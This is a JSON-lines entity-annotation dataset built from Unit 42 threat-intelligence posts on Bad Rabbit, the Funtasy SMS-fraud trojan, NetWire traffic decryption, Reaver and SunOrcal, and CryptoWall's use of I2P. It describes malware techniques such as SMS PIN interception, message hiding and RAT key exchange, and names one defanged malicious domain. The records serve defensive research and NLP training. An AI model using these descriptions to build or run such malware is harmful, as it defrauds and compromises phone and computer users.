{"id":1565,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1566,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1567,"text":"This Unit 42 blog post provides an update on the threat situation surrounding the Bad Rabbit ransomware attacks.","entities":[{"id":4684,"label":"identity","start_offset":5,"end_offset":12},{"id":4686,"label":"malware","start_offset":82,"end_offset":92}],"relations":[],"Comments":[]} {"id":1568,"text":" Attack Overview","entities":[],"relations":[],"Comments":[]} {"id":1569,"text":" Bad Rabbit is a ransomware attack that, at the time of this writing, appears to primarily be affecting countries in Eastern Europe.","entities":[{"id":45059,"label":"malware","start_offset":1,"end_offset":11},{"id":45060,"label":"location","start_offset":117,"end_offset":131}],"relations":[{"id":75,"from_id":45059,"to_id":45060,"type":"targets"}],"Comments":[]} {"id":1570,"text":"While not spreading as widely as the Petya\/NotPetya attacks, reports indicate that where Bad Rabbit has hit, it has caused severe disruption.","entities":[{"id":4690,"label":"malware","start_offset":37,"end_offset":42},{"id":4691,"label":"malware","start_offset":43,"end_offset":51},{"id":4692,"label":"malware","start_offset":89,"end_offset":99}],"relations":[],"Comments":[]} {"id":1571,"text":"The Ukrainian CERT has issued an alert on Bad Rabbit.","entities":[{"id":4696,"label":"malware","start_offset":42,"end_offset":52},{"id":46828,"label":"identity","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} {"id":1572,"text":" As detailed below, Bad Rabbit gains initial entry by posing as an Adobe Flash update.","entities":[{"id":45062,"label":"malware","start_offset":20,"end_offset":30},{"id":45063,"label":"SOFTWARE","start_offset":67,"end_offset":78}],"relations":[{"id":240,"from_id":45062,"to_id":45063,"type":"related-to"}],"Comments":[]} {"id":1573,"text":"Once inside a network it spreads by harvesting credentials with the Mimikatz tool as well as using hard coded credentials.","entities":[{"id":46829,"label":"tools","start_offset":68,"end_offset":76},{"id":46830,"label":"attack-pattern","start_offset":36,"end_offset":58},{"id":46831,"label":"attack-pattern","start_offset":99,"end_offset":121}],"relations":[],"Comments":[]} {"id":1574,"text":" Bad Rabbit is similar to Petya\/NotPetya insofar as it encrypts the entire disk.","entities":[{"id":4702,"label":"malware","start_offset":1,"end_offset":11},{"id":4703,"label":"malware","start_offset":26,"end_offset":31},{"id":4704,"label":"malware","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} {"id":1575,"text":" We are not aware of any reports of successful recovery after paying the ransom.","entities":[],"relations":[],"Comments":[]} {"id":1576,"text":" Because the initial attack vector is through bogus updates, Bad Rabbit attacks can be prevented by only getting Adobe Flash updates from the Adobe web site.","entities":[{"id":4708,"label":"malware","start_offset":61,"end_offset":71},{"id":46832,"label":"SOFTWARE","start_offset":113,"end_offset":124},{"id":46833,"label":"identity","start_offset":142,"end_offset":147}],"relations":[],"Comments":[]} {"id":1577,"text":" Reconnaissance This attack does not appear to be targeted.","entities":[],"relations":[],"Comments":[]} {"id":1578,"text":"Therefore, there appears to be little reconnaissance as part of this attack.","entities":[],"relations":[],"Comments":[]} {"id":1579,"text":" Delivery\/Exploitation","entities":[],"relations":[],"Comments":[]} {"id":1580,"text":" According to ESET, the initial infection vector for Bad Rabbit is through a fake Adobe Flash update that is offered up from compromised websites.","entities":[{"id":4716,"label":"malware","start_offset":53,"end_offset":63},{"id":46834,"label":"identity","start_offset":14,"end_offset":18},{"id":46835,"label":"SOFTWARE","start_offset":82,"end_offset":93}],"relations":[{"id":241,"from_id":4716,"to_id":46835,"type":"related-to"}],"Comments":[]} {"id":1581,"text":"Proofpoint researcher Darien Huss‏ has reported this fake update was hosted at 1dnscontrol[.]com.","entities":[{"id":45064,"label":"identity","start_offset":0,"end_offset":10},{"id":45066,"label":"DOMAIN","start_offset":79,"end_offset":96},{"id":45065,"label":"identity","start_offset":22,"end_offset":33}],"relations":[],"Comments":[]} {"id":1582,"text":"Reports differ on whether this is delivered through social engineering that convinces the user to install the fake update or if it is delivered silently through unpatched vulnerabilities (i.e. “drive-by” installs). Lateral Movement","entities":[],"relations":[],"Comments":[]} {"id":1583,"text":" Once inside a network, Bad Rabbit propagates itself to other systems.","entities":[{"id":4721,"label":"malware","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} {"id":1584,"text":"Reports indicate that it harvests credentials using Mimikatz and Maarten van Dantzig reports it also uses common hardcoded credentials to spread.","entities":[{"id":45067,"label":"tools","start_offset":52,"end_offset":60},{"id":45068,"label":"identity","start_offset":65,"end_offset":84},{"id":45069,"label":"attack-pattern","start_offset":25,"end_offset":45}],"relations":[{"id":76,"from_id":45069,"to_id":45067,"type":"uses"}],"Comments":[]} {"id":1585,"text":" Command and Control (C2) At this time, we have no information on command and control for Bad Rabbit.","entities":[{"id":46836,"label":"malware","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} {"id":1586,"text":" Conclusion Bad Rabbit is not as widespread of an attack as Petya\/NotPetya but is causing severe disruptions where it is occurring.","entities":[{"id":4729,"label":"malware","start_offset":13,"end_offset":23},{"id":4730,"label":"malware","start_offset":61,"end_offset":66},{"id":4731,"label":"malware","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":1587,"text":"It is similar to Petya\/NotPetya in terms of the impact of a successful attack.","entities":[{"id":45070,"label":"malware","start_offset":17,"end_offset":22},{"id":45071,"label":"malware","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} {"id":1588,"text":"However, it is a different attack with different malware.","entities":[],"relations":[],"Comments":[]} {"id":1589,"text":" We will update this blog with new information as it becomes available.","entities":[],"relations":[],"Comments":[]} {"id":1590,"text":" For information on how Palo Alto Networks products prevent Bad Rabbit, please see our Palo Alto Networks Protections Against Bad Rabbit Ransomware Attacks blog post.","entities":[{"id":45073,"label":"malware","start_offset":60,"end_offset":70},{"id":45074,"label":"identity","start_offset":87,"end_offset":105},{"id":45072,"label":"identity","start_offset":24,"end_offset":42},{"id":45075,"label":"malware","start_offset":130,"end_offset":136}],"relations":[],"Comments":[]} {"id":1591,"text":" As always if you have any questions, please come to the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} {"id":1592,"text":" Version Summary October 24, 2017 2:30 p.m. PT Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46837,"label":"TIME","start_offset":18,"end_offset":47}],"relations":[],"Comments":[]} {"id":1593,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1594,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1595,"text":"Palo Alto Networks WildFire detected a new Android Trojan on May 7th, 2014 when a customer using our enterprise security platform downloaded the malicious application from the Google Play store.","entities":[{"id":46841,"label":"TIME","start_offset":61,"end_offset":74},{"id":46840,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":46842,"label":"SOFTWARE","start_offset":176,"end_offset":193}],"relations":[],"Comments":[]} {"id":1596,"text":"We’ve named the malware family Funtasy, based on the domain it uses for registering compromised phones to the premium SMS service.","entities":[{"id":45076,"label":"malware","start_offset":31,"end_offset":38}],"relations":[],"Comments":[]} {"id":1597,"text":"The first version of Funtasy we detected is a fake television remote control application.","entities":[{"id":46844,"label":"malware","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} {"id":1598,"text":" Figure 1: Funtasy Trojan Disguised as TV Remote Control App.","entities":[{"id":46845,"label":"malware","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":1599,"text":" A developer using the ID “fun app” published the Trojan, and the remote control application they uploaded on April 21 is their most successful app so far, with between 10,000 and 50,000 downloads on the play store.","entities":[{"id":46846,"label":"TIME","start_offset":110,"end_offset":118}],"relations":[],"Comments":[]} {"id":1600,"text":"Based on the reviews, the application does not function very well as a remote, but in reality it doesn’t contain remote control capability.","entities":[],"relations":[],"Comments":[]} {"id":1601,"text":"There’s no mention of a premium SMS service in the description, but a review of the permissions reveals that the program will have complete access to SMS messages.","entities":[],"relations":[],"Comments":[]} {"id":1602,"text":" Figure 2: Remote control app requests complete control over your SMS messages.","entities":[],"relations":[],"Comments":[]} {"id":1603,"text":" After the user installs the remote application and opens it, they are presented with a terms of service screen.","entities":[],"relations":[],"Comments":[]} {"id":1604,"text":"This is the user’s only chance to realize that opening this application is going to cost them dearly.","entities":[],"relations":[],"Comments":[]} {"id":1605,"text":" Figure 3: Remote control app terms of service.","entities":[],"relations":[],"Comments":[]} {"id":1606,"text":" If you can’t read the fine print, I don’t blame you.","entities":[],"relations":[],"Comments":[]} {"id":1607,"text":"Here’s the text decoded from the application’s source code.","entities":[],"relations":[],"Comments":[]} {"id":1608,"text":"Servicio de suscripción para usuarios Movistar, Vodafone, Orange, Yoigo, R y Simyo para mayores de edad o menores con capacidad legal para contratar, prestados por (FUNTASY MOBILE S.L., operador titular ARGATEL SOLUTIONS SL, n. atención al cliente 902 303 803 ó inf@argatel.com, apartado de correos 167, 17001 Girona.","entities":[],"relations":[],"Comments":[]} {"id":1609,"text":"Coste por SMS recibido 1.46 euros\/sms (IVA incluido) más el coste de navegación WAP, que dependerá del operador que tenga contratado.","entities":[],"relations":[],"Comments":[]} {"id":1610,"text":"Máximo 10 sms\/semana.","entities":[],"relations":[],"Comments":[]} {"id":1611,"text":"El límite máximo de facturación del servicio puede variar en función de tu operador (18 a 30 euros\/mes).","entities":[],"relations":[],"Comments":[]} {"id":1612,"text":"Baja automática para cancelar el servicio: envía BAJA al 797977.","entities":[],"relations":[],"Comments":[]} {"id":1613,"text":" This message is pretty straightforward, assuming the user actually reads it.","entities":[],"relations":[],"Comments":[]} {"id":1614,"text":"It explains that by opening the application the reader agrees to receive up to 10 SMS messages a week at a cost of 1.46 euros each.","entities":[],"relations":[],"Comments":[]} {"id":1615,"text":"The maximum cost per month should between 18 and 30 euros per month.","entities":[],"relations":[],"Comments":[]} {"id":1616,"text":"If the user would like to unsubscribe they can text “BAJA” to 797977.","entities":[],"relations":[],"Comments":[]} {"id":1617,"text":"Any user who reads this message and understands it is unlikely to agree, but Funtasy does not even wait for their agreement.","entities":[{"id":46847,"label":"malware","start_offset":77,"end_offset":84}],"relations":[],"Comments":[]} {"id":1618,"text":" While the terms page is on the screen, in the background the Trojan checks to see if the phone is attached to a network with one of the following mobile network codes (MNC): Each of these networks is Spanish, except for a single Australian network.","entities":[],"relations":[],"Comments":[]} {"id":1619,"text":"This data, along with an encoded version of the Terms of Service are stored as static strings in the Android package file.","entities":[],"relations":[],"Comments":[]} {"id":1620,"text":" Constants.java After determining the phone is on one of the correct networks, the malware searches for the phone’s mobile number.","entities":[{"id":45079,"label":"FILEPATH","start_offset":1,"end_offset":15}],"relations":[],"Comments":[]} {"id":1621,"text":"It does this in three ways:","entities":[],"relations":[],"Comments":[]} {"id":1622,"text":" Util.java With the phone’s number captured, Funtasy then registers the mobile account with a premium SMS service by sending an HTTP POST request to the following URL. The request is made without the users knowledge, they have no choice to select a number.","entities":[{"id":46848,"label":"FILEPATH","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} {"id":1623,"text":"Of course, premium SMS services require that the user confirm that they want to sign up by sending incoming SMS message containing a PIN.","entities":[],"relations":[],"Comments":[]} {"id":1624,"text":" Funtasy intercepts this message, parses out the PIN and sends it back to the registration server, completing the enrollment process.","entities":[],"relations":[],"Comments":[]} {"id":1625,"text":" IncomingSms.java Of course, once users begin receiving the SMS messages, they are likely to unsubscribe from the service they never really wanted.","entities":[{"id":46849,"label":"FILEPATH","start_offset":1,"end_offset":17}],"relations":[],"Comments":[]} {"id":1626,"text":"To prevent this, Funtasy blocks the incoming messages before they are displayed to the user and modifies the time stamp on each message to make them appear to have been received 15 days earlier.","entities":[{"id":46850,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":1627,"text":"This moves it to the back of the inbox there the victim is unlikely to ever see it.","entities":[],"relations":[],"Comments":[]} {"id":1628,"text":" Funtasy does this even when the victim uses alternative SMS managers, like Google Hangouts or GO SMS Pro.","entities":[{"id":46851,"label":"SOFTWARE","start_offset":76,"end_offset":91},{"id":46853,"label":"malware","start_offset":1,"end_offset":8},{"id":46852,"label":"SOFTWARE","start_offset":95,"end_offset":105}],"relations":[],"Comments":[]} {"id":1629,"text":" After evaluating the remote control app and finding malicious behavior, we decided to evaluate all of the other applications published by “fun app”, and found 12 more which all contains the exact same behavior. Figure 4:","entities":[{"id":46854,"label":"identity","start_offset":140,"end_offset":147}],"relations":[],"Comments":[]} {"id":1630,"text":"Additional “fun app” applications, all contain the Funtasy Trojan.","entities":[{"id":46855,"label":"identity","start_offset":12,"end_offset":19},{"id":46856,"label":"malware","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} {"id":1631,"text":" Each of these applications is designed to appear like a legitimate application already in the app store.","entities":[],"relations":[],"Comments":[]} {"id":1632,"text":"To raise the ranking of these apps, the author appears to have given many of them five-star ratings.","entities":[],"relations":[],"Comments":[]} {"id":1633,"text":"Unfortunately for them, this gave us additional insight into their operation.","entities":[],"relations":[],"Comments":[]} {"id":1634,"text":" To rate and comment on applications, users must have a Google account.","entities":[{"id":46857,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} {"id":1635,"text":"One account using the name “Oscar Sanchez” gave high ratings and positive comments to many of the “fun app” applications.","entities":[{"id":45081,"label":"identity","start_offset":28,"end_offset":41},{"id":46858,"label":"identity","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} {"id":1636,"text":"He also rated apps made by two additional publishers with the names \"MilApps101\" and \"Milapps102.\"","entities":[{"id":46859,"label":"malware","start_offset":69,"end_offset":79},{"id":46860,"label":"malware","start_offset":86,"end_offset":96}],"relations":[],"Comments":[]} {"id":1637,"text":"Between the two of these developers they have produced five applications, and we’ve found that every one of them contains the Funtasy Trojan.","entities":[{"id":46861,"label":"malware","start_offset":126,"end_offset":133}],"relations":[],"Comments":[]} {"id":1638,"text":"While the name “Oscar Sanchez” may be a pseudonym","entities":[{"id":45082,"label":"identity","start_offset":16,"end_offset":29}],"relations":[],"Comments":[]} {"id":1639,"text":", Whois data indicates it was also used to register the domain hosting the Funtasy Mobile premium SMS service.","entities":[{"id":46862,"label":"malware","start_offset":75,"end_offset":82}],"relations":[],"Comments":[]} {"id":1640,"text":" In total we’ve found 18 different applications in the Google Play store that contain the Funtasy Trojan.","entities":[{"id":46863,"label":"malware","start_offset":90,"end_offset":97},{"id":46864,"label":"SOFTWARE","start_offset":55,"end_offset":66}],"relations":[{"id":242,"from_id":46864,"to_id":46863,"type":"hosts"}],"Comments":[]} {"id":1641,"text":"Each of these files also has the same internal class structure, which is represented by the tree structure below.","entities":[],"relations":[],"Comments":[]} {"id":1642,"text":"Figure 5: Funtasy internal class structure.","entities":[],"relations":[],"Comments":[]} {"id":1643,"text":" Researchers interested in investigating them further can find more information in the table below.","entities":[],"relations":[],"Comments":[]} {"id":1644,"text":" Using this Trojan the attacker could be generating up to 30 euros per month for over 67,000 infected mobile phones.","entities":[],"relations":[],"Comments":[]} {"id":1645,"text":"That adds up to 2 million euros per month, but the actual number is likely much lower.","entities":[],"relations":[],"Comments":[]} {"id":1646,"text":"Many of the users who downloaded the tool may not be using one of the targeted Spanish or Australian networks.","entities":[],"relations":[],"Comments":[]} {"id":1647,"text":"Figure 6: List of Android APK files infected with Funtasy Trojan ","entities":[{"id":45083,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":45084,"label":"malware","start_offset":50,"end_offset":64}],"relations":[],"Comments":[]} {"id":1648,"text":"Users who want to defend against the Funtasy Trojan should not rely on traditional antivirus programs, as they do not currently detect this threat.","entities":[{"id":46865,"label":"malware","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} {"id":1649,"text":"Common sense is the best defense against these types of abusive programs.","entities":[],"relations":[],"Comments":[]} {"id":1650,"text":"While many users breeze past the list of permissions required when installing new apps, readers of this blog should ask themselves, “Does my electronic bible need to read my SMS messages?” Sign up to receive the latest news, cyber threat intelligence and research from us ","entities":[],"relations":[],"Comments":[]} {"id":1651,"text":"Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1652,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1653,"text":"On July 22, Palo Alto Networks threat intelligence team, Unit 42, released our first report on the evolution of “Silver Spaniel” 419 scammers.","entities":[{"id":45085,"label":"identity","start_offset":12,"end_offset":55},{"id":45086,"label":"identity","start_offset":57,"end_offset":64},{"id":45089,"label":"TIME","start_offset":3,"end_offset":10},{"id":45087,"label":"malware","start_offset":113,"end_offset":127}],"relations":[],"Comments":[]} {"id":1654,"text":" Of particular note is how these actors use a Remote Administration Tool (RAT) named NetWire (part of the NetWiredRC malware family).","entities":[{"id":46866,"label":"malware","start_offset":85,"end_offset":92},{"id":46867,"label":"malware","start_offset":106,"end_offset":116}],"relations":[{"id":243,"from_id":46866,"to_id":46867,"type":"variant-of"}],"Comments":[]} {"id":1655,"text":"This RAT gives a remote attacker complete control over a Windows, Mac OS X, or Linux system through a simple graphical user interface.","entities":[{"id":46870,"label":"SOFTWARE","start_offset":78,"end_offset":84},{"id":46868,"label":"SOFTWARE","start_offset":57,"end_offset":64},{"id":46869,"label":"SOFTWARE","start_offset":66,"end_offset":74}],"relations":[],"Comments":[]} {"id":1656,"text":" To better understand this RAT, our team reverse engineered the communication protocol that NetWire uses.","entities":[{"id":45090,"label":"malware","start_offset":92,"end_offset":99}],"relations":[],"Comments":[]} {"id":1657,"text":"Today we have released a tool that decrypts NetWire traffic and outputs any commands issued by the attacker.","entities":[{"id":4924,"label":"malware","start_offset":44,"end_offset":51}],"relations":[],"Comments":[]} {"id":1658,"text":" NetWire uses a custom, TCP-based protocol.","entities":[{"id":4926,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":1659,"text":"The producer of the NetWire WorldWiredLabs, states that the tool uses 256-bit AES encryption, which we found to be accurate.","entities":[{"id":45091,"label":"malware","start_offset":20,"end_offset":42}],"relations":[],"Comments":[]} {"id":1660,"text":"The tool generates two encryption keys using a static password that the attacker chooses when creating the NetWire binary.","entities":[{"id":46871,"label":"malware","start_offset":107,"end_offset":114}],"relations":[],"Comments":[]} {"id":1661,"text":"Each packet has the following structure: < 4 Byte Little-Endian length > < 1 Byte Command >","entities":[],"relations":[],"Comments":[]} {"id":1662,"text":"< Data >","entities":[],"relations":[],"Comments":[]} {"id":1663,"text":" The shortest possible packet is the “HeartBeat” command, which NetWire generates every 10 seconds.","entities":[{"id":46872,"label":"malware","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} {"id":1664,"text":" The initial packet from the client to the server shows a data and command length of 65 bytes (0x41 listed at the beginning of the packet) with a command byte of 0x03. Within that data is a 32-byte seed value followed by a 16-byte initialization vector (IV) value.","entities":[],"relations":[],"Comments":[]} {"id":1665,"text":"The client then combines the 32-byte seed value with the static password in a predetermined fashion to form an AES key.","entities":[],"relations":[],"Comments":[]} {"id":1666,"text":"Upon receiving the initial packet, the server uses the seed value and password to generate the client’s session key.","entities":[],"relations":[],"Comments":[]} {"id":1667,"text":"It then generates its own 32-byte seed value to create it’s own session key and sends the seed value to the client.","entities":[],"relations":[],"Comments":[]} {"id":1668,"text":"The client combines this with the password and generates the same key.","entities":[],"relations":[],"Comments":[]} {"id":1669,"text":"At this point, the key exchange is complete and both client and server hold the same two keys, which they can use to encrypt and decrypt traffic.","entities":[],"relations":[],"Comments":[]} {"id":1670,"text":" With the two keys in place, the malware uses the AES algorithm to encrypt traffic using Output Feedback (OFB) mode (Picture courtesy of Wikipedia). The output of the block cipher encryption is eXclusive OR’ed (XOR’d) with 16 bytes of ciphertext to decrypt. Each subsequent block of ciphertext will use the previous encrypted data as the IV passed into the block cipher encryption function.","entities":[],"relations":[],"Comments":[]} {"id":1671,"text":"The malware has a full suite of possible commands, 76 to be exact.","entities":[],"relations":[],"Comments":[]} {"id":1672,"text":"Upon receipt of a command from the server, a single function is called to decrypt the payload data and execute the received instruction.","entities":[],"relations":[],"Comments":[]} {"id":1673,"text":"The value in the command byte determines which of the commands is run through a 76 way switch statement.","entities":[],"relations":[],"Comments":[]} {"id":1674,"text":" A complete list of the possible commands available in NetWire was documented by CIRCL in April. The NetWire decoder uses data from a packet capture file to generate the client and server session keys then decode the remaining encrypted packets.","entities":[{"id":45092,"label":"malware","start_offset":55,"end_offset":62},{"id":45093,"label":"malware","start_offset":102,"end_offset":109}],"relations":[],"Comments":[]} {"id":1675,"text":"The user needs to know the IP of the infected client, the port used by malware and the encryption password to properly decode the traffic.","entities":[],"relations":[],"Comments":[]} {"id":1676,"text":"This password is set to “Password” by default, but can be retrieved from NetWire binaries if the attacker used something more secure.","entities":[{"id":4975,"label":"malware","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} {"id":1677,"text":"The usage for the tool is show below.","entities":[],"relations":[],"Comments":[]} {"id":1678,"text":" At this time the tool works against the latest version of NetWire, 1.5c.","entities":[{"id":4979,"label":"malware","start_offset":59,"end_offset":66}],"relations":[],"Comments":[]} {"id":1679,"text":"We hope this tool will be valuable to incident responders and others who are plagued by NetWire infections.","entities":[{"id":4985,"label":"malware","start_offset":88,"end_offset":95}],"relations":[],"Comments":[]} {"id":1680,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1681,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1682,"text":"Unit 42 has recently been investigating a new malware family called Reaver.","entities":[{"id":46873,"label":"identity","start_offset":0,"end_offset":7},{"id":46874,"label":"malware","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} {"id":1683,"text":"While we have identified it as being active since late 2016, Reaver has been used sparingly, with only a small number of unique samples identified.","entities":[{"id":45094,"label":"malware","start_offset":61,"end_offset":67}],"relations":[],"Comments":[]} {"id":1684,"text":"Its targets have been movements the Chinese government consider dangerous, also known as the “Five Poisons.”","entities":[{"id":46875,"label":"identity","start_offset":36,"end_offset":54}],"relations":[],"Comments":[]} {"id":1685,"text":"We found that the Reaver malware family has shared command-and-control (C2) infrastructure overlap SunOrcal malware, and that these have been used concurrently since late 2016.","entities":[{"id":4998,"label":"malware","start_offset":18,"end_offset":24},{"id":5000,"label":"malware","start_offset":99,"end_offset":107},{"id":46876,"label":"TIME","start_offset":171,"end_offset":175}],"relations":[],"Comments":[]} {"id":1686,"text":"While investigating Reaver we recently also discovered a new variant of the SunOrcal malware family.","entities":[{"id":45095,"label":"malware","start_offset":20,"end_offset":26},{"id":5004,"label":"malware","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} {"id":1687,"text":"While the SunOrcal malware family has been confirmed to have been active since 2013, possibly even earlier, this new variant has been observed targeting regions outside of the typical target radius for this threat group, now expanding to include Vietnam and Myanmar.","entities":[{"id":5005,"label":"malware","start_offset":10,"end_offset":18},{"id":46877,"label":"TIME","start_offset":79,"end_offset":83},{"id":46878,"label":"location","start_offset":246,"end_offset":253},{"id":46879,"label":"location","start_offset":258,"end_offset":265}],"relations":[{"id":244,"from_id":5005,"to_id":46878,"type":"targets"},{"id":246,"from_id":5005,"to_id":46879,"type":"targets"}],"Comments":[]} {"id":1688,"text":" How it Works","entities":[],"relations":[],"Comments":[]} {"id":1689,"text":"Emails were sent to targets containing malicious attachments.","entities":[{"id":45097,"label":"attack-pattern","start_offset":39,"end_offset":60}],"relations":[],"Comments":[]} {"id":1690,"text":"Targeting a Vietnamese speaking audience, one of the malicious documents mentions Donald Trump and the disputed South China Sea area.","entities":[{"id":46880,"label":"location","start_offset":112,"end_offset":132},{"id":46881,"label":"identity","start_offset":82,"end_offset":94},{"id":46882,"label":"attack-pattern","start_offset":53,"end_offset":72}],"relations":[],"Comments":[]} {"id":1691,"text":"This is a classic lure technique – including something the target will find interesting or important causing them to open the file and download the malware on to the victims’ system.","entities":[],"relations":[],"Comments":[]} {"id":1692,"text":" How to Defend Against it These malware attacks utilize email phishing, and relies on targets opening the malicious email attachment.","entities":[{"id":45098,"label":"attack-pattern","start_offset":106,"end_offset":132},{"id":45099,"label":"attack-pattern","start_offset":56,"end_offset":70},{"id":5021,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} {"id":1693,"text":"Security awareness is critical to avoid falling victim to such an attack.","entities":[],"relations":[],"Comments":[]} {"id":1694,"text":" General email best practices: If you are unsure of the legitimacy of the email, contact the sender directly over the phone or by typing a trusted URL directly in your browser or saved bookmark.","entities":[],"relations":[],"Comments":[]} {"id":1695,"text":"Additionally, keeping your systems and devices updated with the most current operating system and web browser is a general security best practice, as well as enabling multi-factor authentication to prevent an attacker from abusing credentials should they successfully capture them","entities":[],"relations":[],"Comments":[]} {"id":1696,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1697,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1698,"text":"For a moment, put yourself in the shoes of a cyber criminal.","entities":[],"relations":[],"Comments":[]} {"id":1699,"text":"You’ve collected an array of tools (malware), built up your infrastructure (command and control (C2) servers) and you have a process to make money off your hard work.","entities":[],"relations":[],"Comments":[]} {"id":1700,"text":"You wake up on Monday morning and the domains your carefully built malware uses for command and control are shut down.","entities":[],"relations":[],"Comments":[]} {"id":1701,"text":"Some security researcher has taken control of them, completely halting your operation.","entities":[],"relations":[],"Comments":[]} {"id":1702,"text":"This would certainly be good news to anyone reading this blog, but for the criminal it’s a big setback and source of frustration.","entities":[],"relations":[],"Comments":[]} {"id":1703,"text":"These kinds of takedowns are the impetus for some of the most impressive developments in malware technology over the last decade.","entities":[],"relations":[],"Comments":[]} {"id":1704,"text":" Once attackers have infected a PC through some exploit or social engineering, one of their major challenges is keeping control of that system.","entities":[],"relations":[],"Comments":[]} {"id":1705,"text":"Antivirus programs running on the PC are trying eradicate the threat, the command and control domains and IPs are being added to denylist and blocked by networks around the world.","entities":[],"relations":[],"Comments":[]} {"id":1706,"text":"Many malware authors have taken to building complex mechanisms to ensure that their malware is resistant to these kind of blocks and takedowns.","entities":[],"relations":[],"Comments":[]} {"id":1707,"text":"Some of the more innovative mechanisms include: These mechanisms are often only used when the primary (and simpler) C2 mechanism has been shut down, but their use makes shutting down a botnet much more challenging.","entities":[],"relations":[],"Comments":[]} {"id":1708,"text":" Last year we highlighted two malware families on this blog: CryptoWall 2.0 and Dyreza\/Dyre.","entities":[{"id":46883,"label":"malware","start_offset":61,"end_offset":75},{"id":46884,"label":"malware","start_offset":80,"end_offset":86},{"id":46885,"label":"malware","start_offset":87,"end_offset":91}],"relations":[{"id":247,"from_id":46884,"to_id":46885,"type":"duplicate-of"}],"Comments":[]} {"id":1709,"text":"CryptoWall is one of multiple ransomware families that generated income for the attacker by encrypting files on the infected PC with a private key that is in the control of the attacker.","entities":[{"id":5075,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":1710,"text":"The attacker then charges a ransom (normally around $500) to give up the key that will unlock the files.","entities":[],"relations":[],"Comments":[]} {"id":1711,"text":" In October, CryptoWall 2.0 began using the Tor anonymity network to serve web pages to infected users who wanted their encrypted files back.","entities":[{"id":5083,"label":"tools","start_offset":44,"end_offset":47},{"id":46886,"label":"TIME","start_offset":4,"end_offset":11},{"id":46887,"label":"malware","start_offset":13,"end_offset":27}],"relations":[{"id":248,"from_id":46887,"to_id":5083,"type":"uses"}],"Comments":[]} {"id":1712,"text":"In this case a legitimate service (Tor) was being abused by CryptoWall so it could avoid having its C2 servers shut down.","entities":[{"id":5086,"label":"malware","start_offset":60,"end_offset":70},{"id":5085,"label":"tools","start_offset":35,"end_offset":38}],"relations":[{"id":249,"from_id":5086,"to_id":5085,"type":"uses"}],"Comments":[]} {"id":1713,"text":"In the past few weeks we've seen another anonymity network, I2P, being abused by both the latest version of CryptoWall (3.0) and the Dyre banking Trojan.","entities":[{"id":45100,"label":"malware","start_offset":108,"end_offset":124},{"id":45101,"label":"malware","start_offset":133,"end_offset":152},{"id":45102,"label":"SOFTWARE","start_offset":60,"end_offset":63},{"id":5088,"label":"malware","start_offset":108,"end_offset":118}],"relations":[],"Comments":[]} {"id":1714,"text":" While I2P is far less popular than Tor, it provides similar functionality to the user.","entities":[{"id":5091,"label":"tools","start_offset":36,"end_offset":39},{"id":46888,"label":"SOFTWARE","start_offset":7,"end_offset":10}],"relations":[],"Comments":[]} {"id":1715,"text":"I2P is an overlay network on top of the Internet that creates encrypted links between nodes that are running the I2P software.","entities":[{"id":46889,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":46890,"label":"SOFTWARE","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} {"id":1716,"text":"I2P users can access specific I2P services that are only accessible on I2P, or access Internet resources without exposing their IP address. In the case of CryptoWall 3.0, the malware is attempting to access multiple .i2p resources only accessible through I2P, also known as “eepSites.” The CryptoWall 3.0 uses I2P in the same way CryptoWall 2.0 used Tor, to give victims access to a decrypting service to get their files 